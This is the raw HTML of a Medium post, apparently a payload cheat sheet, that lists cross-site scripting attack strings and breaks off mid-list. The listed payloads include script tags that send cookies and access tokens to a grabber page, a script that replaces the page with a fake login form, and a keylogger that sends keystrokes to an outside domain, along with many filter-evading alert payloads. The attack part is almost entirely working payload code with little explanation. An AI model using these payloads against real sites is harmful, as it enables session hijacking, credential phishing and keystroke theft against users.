8.131-13.274 8.336-9.503 0-14.736-6.419-14.736-18.073V43.638l-43.714 12.55v1.703l.262.024c9.459.84 12.05 4.097 12.05 15.152v50.17a56.3 56.3 0 0 0 .91 10.444l.787 3.423c3.701 13.262 13.398 20.197 28.59 20.197 12.868 0 24.147-7.966 29.115-20.43v17.311h43.714v-1.747zm169.818 1.788v-1.749l-.213-.05c-8.7-2.006-12.089-5.789-12.089-13.49v-63.79c0-19.89-11.171-31.761-29.883-31.761-13.64 0-25.141 7.882-29.569 20.16-3.517-13.01-13.639-20.16-28.606-20.16-13.146 0-23.449 6.938-27.869 18.657V43.643L545.487 55.68v1.715l.263.024c9.345.829 12.047 4.181 12.047 14.95v81.784h40.787v-1.746l-.215-.053c-6.941-1.631-9.181-4.606-9.181-12.239V66.998c1.836-4.289 5.537-9.37 12.853-9.37 9.086 0 13.692 6.296 13.692 18.697v77.828h40.797v-1.746l-.215-.053c-6.94-1.631-9.18-4.606-9.18-12.239V75.066a42 42 0 0 0-.578-7.26c1.947-4.661 5.86-10.177 13.475-10.177 9.214 0 13.691 6.114 13.691 18.696v77.828z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003cdiv class=\"ax h\"\u003e\u003cdiv class=\"ab ay az ba bb q bc bd\"\u003e\n\u003cdiv class=\"bm\" aria-hidden=\"false\" aria-describedby=\"searchResults\" aria-labelledby=\"searchResults\"\u003e\u003c\/div\u003e\n\u003cdiv class=\"bn bo ab\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\"\u003e\u003cpath fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M4.092 11.06a6.95 6.95 0 1 1 13.9 0 6.95 6.95 0 0 1-13.9 0m6.95-8.05a8.05 8.05 0 1 0 5.13 14.26l3.75 3.75a.56.56 0 1 0 .79-.79l-3.73-3.73A8.05 8.05 0 0 0 11.042 3z\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\n\u003cinput role=\"combobox\" aria-controls=\"searchResults\" aria-expanded=\"false\" aria-label=\"search\" data-testid=\"headerSearchInput\" tabindex=\"0\" class=\"ay be bf bg z bh bi bj bk bl\" placeholder=\"Search\" value=\"\"\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"h k w fg fh\"\u003e\u003cdiv class=\"fi ab\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerWriteButton\" href=\"https:\/\/medium.com\/m\/signin?operation=register\u0026amp;redirect=https%3A%2F%2Fmedium.com%2Fnew-story\u0026amp;source=---two_column_layout_nav-----------------------new_post_topnav-----------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"bf b bg z du fj fk ab q fl fm\"\u003e\n\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\" aria-label=\"Write\"\u003e\u003cpath fill=\"currentColor\" d=\"M14 4a.5.5 0 0 0 0-1zm7 6a.5.5 0 0 0-1 0zm-7-7H4v1h10zM3 4v16h1V4zm1 17h16v-1H4zm17-1V10h-1v10zm-1 1a1 1 0 0 0 1-1h-1zM3 20a1 1 0 0 0 1 1v-1zM4 3a1 1 0 0 0-1 1h1z\"\u003e\u003c\/path\u003e\u003cpath stroke=\"currentColor\" d=\"m17.5 4.5-8.458 8.458a.25.25 0 0 0-.06.098l-.824 2.47a.25.25 0 0 0 .316.316l2.47-.823a.25.25 0 0 0 .098-.06L19.5 6.5m-2-2 2.323-2.323a.25.25 0 0 1 .354 0l1.646 1.646a.25.25 0 0 1 0 .354L19.5 6.5m-2-2 2 2\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003cdiv class=\"dt l\"\u003eWrite\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"k j i d\"\u003e\u003cdiv class=\"fi ab\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerSearchButton\" href=\"https:\/\/medium.com\/search?source=---two_column_layout_nav----------------------------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"bf b bg z du fj fk ab q fl fm\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\" aria-label=\"Search\"\u003e\u003cpath fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M4.092 11.06a6.95 6.95 0 1 1 13.9 0 6.95 6.95 0 0 1-13.9 0m6.95-8.05a8.05 8.05 0 1 0 5.13 14.26l3.75 3.75a.56.56 0 1 0 .79-.79l-3.73-3.73A8.05 8.05 0 0 0 11.042 3z\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"fi h k j\"\u003e\u003cdiv class=\"ab q\"\u003e\n\u003cp class=\"bf b dx dy dz ea eb ec ed ee ef eg du\"\u003e\u003cspan\u003e\u003cbutton class=\"bf b dx dy eh dz ea ei eb ec ej ek ee el em eg eo ep eq er es et eu ev ew ex ey ez fa fb fc fd bm fe ff\" data-testid=\"headerSignUpButton\"\u003eSign up\u003c\/button\u003e\u003c\/span\u003e\u003c\/p\u003e\n\u003cdiv class=\"ax l\"\u003e\u003cp class=\"bf b dx dy dz ea eb ec ed ee ef eg du\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerSignInButton\" href=\"https:\/\/medium.com\/m\/signin?operation=login\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;source=post_page---two_column_layout_nav-----------------------global_nav-----------\" rel=\"noopener follow\"\u003eSign in\u003c\/a\u003e\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"l\" aria-hidden=\"false\"\u003e\u003cbutton class=\"ay fn am ab q ao fo fp fq\" aria-label=\"user options menu\" data-testid=\"headerUserIcon\"\u003e\u003cdiv class=\"l fj\"\u003e\n\u003cimg alt=\"\" class=\"l fd by bz ca cx\" src=\"https:\/\/miro.medium.com\/v2\/resize:fill:64:64\/1*dmbNkD5D-u45r44go_cf0g.png\" width=\"32\" height=\"32\" loading=\"lazy\" role=\"presentation\"\u003e\u003cdiv class=\"fr by l bz ca fs n ay ft\"\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/button\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"l\"\u003e\n\u003cdiv class=\"fu fv fw fx fy l\"\u003e\n\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003carticle\u003e\u003cdiv class=\"l\"\u003e\u003cdiv class=\"l\"\u003e\n\u003cspan class=\"l\"\u003e\u003c\/span\u003e\u003csection\u003e\u003cdiv\u003e\n\u003cdiv class=\"fs gi gj gk gl gm\"\u003e\u003c\/div\u003e\n\u003cdiv class=\"gn go gp gq gr\"\u003e\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\n\u003cdiv\u003e\n\u003ch1 id=\"579f\" class=\"pw-post-title gs gt gu bf gv gw gx gy gz ha hb hc hd he hf hg hh hi hj hk hl hm hn ho hp hq hr hs ht hu bk\" data-testid=\"storyTitle\"\u003e\n\u003cstrong class=\"al\"\u003eCross site scripting\u003c\/strong\u003e (\u003cstrong class=\"al\"\u003eXSS\u003c\/strong\u003e) Payloads\u003c\/h1\u003e\n\u003cdiv\u003e\u003cdiv class=\"speechify-ignore ab cp\"\u003e\u003cdiv class=\"speechify-ignore bh l\"\u003e\n\u003cdiv class=\"hv hw hx hy hz ab\"\u003e\n\u003cdiv\u003e\u003cdiv class=\"ab ia\"\u003e\u003ca rel=\"noopener follow\" href=\"\/?source=post_page-----6a492d795c0--------------------------------\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"l ib ic by id ie\"\u003e\u003cdiv class=\"l fj\"\u003e\n\u003cimg alt=\"Pintu Solanki\" class=\"l fd by dd de cx\" src=\"https:\/\/miro.medium.com\/v2\/resize:fill:88:88\/1*XmnNMYitXeyQnWuG-Yv_xQ.jpeg\" width=\"44\" height=\"44\" loading=\"lazy\" data-testid=\"authorPhoto\"\u003e\u003cdiv class=\"if by l dd de fs n ig ft\"\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"bn bh l\"\u003e\n\u003cdiv class=\"ab\"\u003e\u003cdiv style=\"flex:1\"\u003e\u003cspan class=\"bf b bg z bk\"\u003e\u003cdiv class=\"ih ab q\"\u003e\u003cdiv class=\"ab q ii\"\u003e\n\u003cdiv class=\"ab q\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cp class=\"bf b ij ik bk\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar il\" data-testid=\"authorName\" rel=\"noopener follow\" href=\"\/?source=post_page-----6a492d795c0--------------------------------\"\u003ePintu Solanki\u003c\/a\u003e\u003c\/p\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cspan class=\"im in\" aria-hidden=\"true\"\u003e\u003cspan class=\"bf b bg z du\"\u003e·\u003c\/span\u003e\u003c\/span\u003e\u003cp class=\"bf b ij ik du\"\u003e\u003cspan\u003e\u003ca class=\"io ip ah ai aj ak al am an ao ap aq ar ex iq ir\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fsubscribe%2Fuser%2F6a7d492724f5\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=post_page-6a7d492724f5----6a492d795c0---------------------post_header-----------\" rel=\"noopener follow\"\u003eFollow\u003c\/a\u003e\u003c\/span\u003e\u003c\/p\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"l is\"\u003e\u003cspan class=\"bf b bg z du\"\u003e\u003cdiv class=\"ab cn it iu iv\"\u003e\u003cspan class=\"bf b bg z du\"\u003e\u003cdiv class=\"ab ae\"\u003e\n\u003cspan data-testid=\"storyReadTime\"\u003e3 min read\u003c\/span\u003e\u003cdiv class=\"iw ix l\" aria-hidden=\"true\"\u003e\u003cspan class=\"l\" aria-hidden=\"true\"\u003e\u003cspan class=\"bf b bg z du\"\u003e·\u003c\/span\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003cspan data-testid=\"storyPublishDate\"\u003eApr 3, 2021\u003c\/span\u003e\n\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ab cp iy iz ja jb jc jd je jf jg jh ji jj jk jl jm jn\"\u003e\n\u003cdiv class=\"h k w fg fh q\"\u003e\n\u003cdiv class=\"kd l\"\u003e\u003cdiv class=\"ab q ke kf\"\u003e\n\u003cdiv class=\"pw-multi-vote-icon fj kg kh ki kj\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerClapButton\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fvote%2Fp%2F6a492d795c0\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=-----6a492d795c0---------------------clap_footer-----------\" rel=\"noopener follow\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"kk ao kl km kn ko am kp kq kr kj\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" viewbox=\"0 0 24 24\" aria-label=\"clap\"\u003e\u003cpath fill-rule=\"evenodd\" d=\"M11.37.828 12 3.282l.63-2.454zM13.916 3.953l1.523-2.112-1.184-.39zM8.589 1.84l1.522 2.112-.337-2.501zM18.523 18.92c-.86.86-1.75 1.246-2.62 1.33a6 6 0 0 0 .407-.372c2.388-2.389 2.86-4.951 1.399-7.623l-.912-1.603-.79-1.672c-.26-.56-.194-.98.203-1.288a.7.7 0 0 1 .546-.132c.283.046.546.231.728.5l2.363 4.157c.976 1.624 1.141 4.237-1.324 6.702m-10.999-.438L3.37 14.328a.828.828 0 0 1 .585-1.408.83.83 0 0 1 .585.242l2.158 2.157a.365.365 0 0 0 .516-.516l-2.157-2.158-1.449-1.449a.826.826 0 0 1 1.167-1.17l3.438 3.44a.363.363 0 0 0 .516 0 .364.364 0 0 0 0-.516L5.293 9.513l-.97-.97a.826.826 0 0 1 0-1.166.84.84 0 0 1 1.167 0l.97.968 3.437 3.436a.36.36 0 0 0 .517 0 .366.366 0 0 0 0-.516L6.977 7.83a.82.82 0 0 1-.241-.584.82.82 0 0 1 .824-.826c.219 0 .43.087.584.242l5.787 5.787a.366.366 0 0 0 .587-.415l-1.117-2.363c-.26-.56-.194-.98.204-1.289a.7.7 0 0 1 .546-.132c.283.046.545.232.727.501l2.193 3.86c1.302 2.38.883 4.59-1.277 6.75-1.156 1.156-2.602 1.627-4.19 1.367-1.418-.236-2.866-1.033-4.079-2.246M10.75 5.971l2.12 2.12c-.41.502-.465 1.17-.128 1.89l.22.465-3.523-3.523a.8.8 0 0 1-.097-.368c0-.22.086-.428.241-.584a.847.847 0 0 1 1.167 0m7.355 1.705c-.31-.461-.746-.758-1.23-.837a1.44 1.44 0 0 0-1.11.275c-.312.24-.505.543-.59.881a1.74 1.74 0 0 0-.906-.465 1.47 1.47 0 0 0-.82.106l-2.182-2.182a1.56 1.56 0 0 0-2.2 0 1.54 1.54 0 0 0-.396.701 1.56 1.56 0 0 0-2.21-.01 1.55 1.55 0 0 0-.416.753c-.624-.624-1.649-.624-2.237-.037a1.557 1.557 0 0 0 0 2.2c-.239.1-.501.238-.715.453a1.56 1.56 0 0 0 0 2.2l.516.515a1.556 1.556 0 0 0-.753 2.615L7.01 19c1.32 1.319 2.909 2.189 4.475 2.449q.482.08.971.08c.85 0 1.653-.198 2.393-.579.231.033.46.054.686.054 1.266 0 2.457-.52 3.505-1.567 2.763-2.763 2.552-5.734 1.439-7.586z\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003cdiv class=\"pw-multi-vote-count l ks kt ku kv kw kx ky\"\u003e\u003cp class=\"bf b dv z du\"\u003e\u003cspan class=\"kz\"\u003e--\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cbutton class=\"ao kk la lb ab q fk lc ld\" aria-label=\"responses\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" viewbox=\"0 0 24 24\" class=\"le\"\u003e\u003cpath d=\"M18.006 16.803c1.533-1.456 2.234-3.325 2.234-5.321C20.24 7.357 16.709 4 12.191 4S4 7.357 4 11.482c0 4.126 3.674 7.482 8.191 7.482.817 0 1.622-.111 2.393-.327.231.2.48.391.744.559 1.06.693 2.203 1.044 3.399 1.044.224-.008.4-.112.486-.287a.49.49 0 0 0-.042-.518c-.495-.67-.845-1.364-1.04-2.057a4 4 0 0 1-.125-.598zm-3.122 1.055-.067-.223-.315.096a8 8 0 0 1-2.311.338c-4.023 0-7.292-2.955-7.292-6.587 0-3.633 3.269-6.588 7.292-6.588 4.014 0 7.112 2.958 7.112 6.593 0 1.794-.608 3.469-2.027 4.72l-.195.168v.255c0 .056 0 .151.016.295.025.231.081.478.154.733.154.558.398 1.117.722 1.659a5.3 5.3 0 0 1-2.165-.845c-.276-.176-.714-.383-.941-.59z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/button\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ab q jo jp jq jr js jt ju jv jw jx jy jz ka kb kc\"\u003e\n\u003cdiv class=\"lf k j i d\"\u003e\u003c\/div\u003e\n\u003cdiv class=\"h k\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"headerBookmarkButton\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fbookmark%2Fp%2F6a492d795c0\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;source=-----6a492d795c0---------------------bookmark_footer-----------\" rel=\"noopener follow\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"25\" height=\"25\" fill=\"none\" viewbox=\"0 0 25 25\" class=\"du lg\" aria-label=\"Add to list bookmark button\"\u003e\u003cpath fill=\"currentColor\" d=\"M18 2.5a.5.5 0 0 1 1 0V5h2.5a.5.5 0 0 1 0 1H19v2.5a.5.5 0 1 1-1 0V6h-2.5a.5.5 0 0 1 0-1H18zM7 7a1 1 0 0 1 1-1h3.5a.5.5 0 0 0 0-1H8a2 2 0 0 0-2 2v14a.5.5 0 0 0 .805.396L12.5 17l5.695 4.396A.5.5 0 0 0 19 21v-8.5a.5.5 0 0 0-1 0v7.485l-5.195-4.012a.5.5 0 0 0-.61 0L7 19.985z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"fd lh cn\"\u003e\u003cdiv class=\"l ae\"\u003e\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"li lj lk ll lm ln ci bh\"\u003e\u003cdiv class=\"ab\"\u003e\u003cdiv class=\"bm bh\" aria-hidden=\"false\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cbutton aria-label=\"Listen\" data-testid=\"audioPlayButton\" class=\"af fk ah ai aj ak al lo an ao ap ex lp lq ld lr ls lt lu lv s lw lx ly lz ma mb mc u md me mf\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\"\u003e\u003cpath fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M3 12a9 9 0 1 1 18 0 9 9 0 0 1-18 0m9-10C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2m3.376 10.416-4.599 3.066a.5.5 0 0 1-.777-.416V8.934a.5.5 0 0 1 .777-.416l4.599 3.066a.5.5 0 0 1 0 .832\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003cdiv class=\"j i d\"\u003e\u003cp class=\"bf b bg z du\"\u003eListen\u003c\/p\u003e\u003c\/div\u003e\u003c\/button\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"bm\" aria-hidden=\"false\" aria-describedby=\"postFooterSocialMenu\" aria-labelledby=\"postFooterSocialMenu\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cbutton aria-controls=\"postFooterSocialMenu\" aria-expanded=\"false\" aria-label=\"Share Post\" data-testid=\"headerSocialShareButton\" class=\"af fk ah ai aj ak al lo an ao ap ex lp lq ld lr ls lt lu lv s lw lx ly lz ma mb mc u md me mf\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\"\u003e\u003cpath fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M15.218 4.931a.4.4 0 0 1-.118.132l.012.006a.45.45 0 0 1-.292.074.5.5 0 0 1-.3-.13l-2.02-2.02v7.07c0 .28-.23.5-.5.5s-.5-.22-.5-.5v-7.04l-2 2a.45.45 0 0 1-.57.04h-.02a.4.4 0 0 1-.16-.3.4.4 0 0 1 .1-.32l2.8-2.8a.5.5 0 0 1 .7 0l2.8 2.79a.42.42 0 0 1 .068.498m-.106.138.008.004v-.01zM16 7.063h1.5a2 2 0 0 1 2 2v10a2 2 0 0 1-2 2h-11c-1.1 0-2-.9-2-2v-10a2 2 0 0 1 2-2H8a.5.5 0 0 1 .35.15.5.5 0 0 1 .15.35.5.5 0 0 1-.15.35.5.5 0 0 1-.35.15H6.4c-.5 0-.9.4-.9.9v10.2a.9.9 0 0 0 .9.9h11.2c.5 0 .9-.4.9-.9v-10.2c0-.5-.4-.9-.9-.9H16a.5.5 0 0 1 0-1\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003cdiv class=\"j i d\"\u003e\u003cp class=\"bf b bg z du\"\u003eShare\u003c\/p\u003e\u003c\/div\u003e\u003c\/button\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003ch1 id=\"e497\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eHow does XSS work?\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"5429\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eCross-site scripting works\u003c\/strong\u003e by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim’s browser, the attacker can fully compromise their interaction with the application.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003ch1 id=\"4dde\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eData grabber for XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"7d70\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eObtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3827\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;script\u0026gt;document.location='http:\/\/localhost\/XSS\/grabber.php?c='+document.cookie\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;document.location='http:\/\/localhost\/XSS\/grabber.php?c='+localStorage.getItem('access_token')\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;new Image().src=\"http:\/\/localhost\/cookie.php?c=\"+document.cookie;\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;new Image().src=\"http:\/\/localhost\/cookie.php?c=\"+localStorage.getItem('access_token');\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"4e0e\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eUI redressing\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"c617\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eLeverage the XSS to modify the HTML content of the page in order to display a fake login form.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"67d7\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;script\u0026gt;\u003cbr\u003ehistory.replaceState(null, null, '..\/..\/..\/login');\u003cbr\u003edocument.body.innerHTML = \"\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;h1\u0026gt;Please login to continue\u0026lt;\/h1\u0026gt;\u0026lt;form\u0026gt;Username: \u0026lt;input type='text'\u0026gt;Password: \u0026lt;input type='password'\u0026gt;\u0026lt;\/form\u0026gt;\u0026lt;input value='submit' type='submit'\u0026gt;\"\u003cbr\u003e\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"92d9\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eJavascript keylogger\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"909e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eAnother way to collect sensitive data is to set a javascript keylogger.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6bee\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;img src=x onerror='document.onkeypress=function(e){fetch(\"http:\/\/domain.com?k=\"+String.fromCharCode(e.which))},this.remove();'\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"810b\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in HTML\/Applications\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"47f7\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eCommon Payloads\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3a69\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\/\/ Basic payload\u003cbr\u003e\u0026lt;script\u0026gt;alert('XSS')\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;scr\u0026lt;script\u0026gt;ipt\u0026gt;alert('XSS')\u0026lt;\/scr\u0026lt;script\u0026gt;ipt\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;script\u0026gt;alert('XSS')\u0026lt;\/script\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;script\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"6b9c\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Img payload\u003cbr\u003e\u0026lt;img src=x onerror=alert('XSS');\u0026gt;\u003cbr\u003e\u0026lt;img src=x onerror=alert('XSS')\/\/\u003cbr\u003e\u0026lt;img src=x onerror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003cbr\u003e\u0026lt;img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003cbr\u003e\u0026lt;img src=x:alert(alt) onerror=eval(src) alt=xss\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;img src=x onerror=alert('XSS');\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;img src=x onerror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003c\/span\u003e\u003cspan id=\"87fa\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Svg payload\u003cbr\u003e\u0026lt;svgonload=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;svg\/onload=alert('XSS')\u0026gt;\u003cbr\u003e\u0026lt;svg onload=alert(1)\/\/\u003cbr\u003e\u0026lt;svg\/onload=alert(String.fromCharCode(88,83,83))\u0026gt;\u003cbr\u003e\u0026lt;svg id=alert(1) onload=eval(id)\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;svg\/onload=alert(String.fromCharCode(88,83,83))\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;svg\/onload=alert(\/XSS\/)\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;script href=data:,alert(1) \/\u0026gt;(`Firefox` is the only browser which allows self closing script)\u003c\/span\u003e\u003cspan id=\"ebf4\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Div payload\u003cbr\u003e\u0026lt;div onpointerover=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div 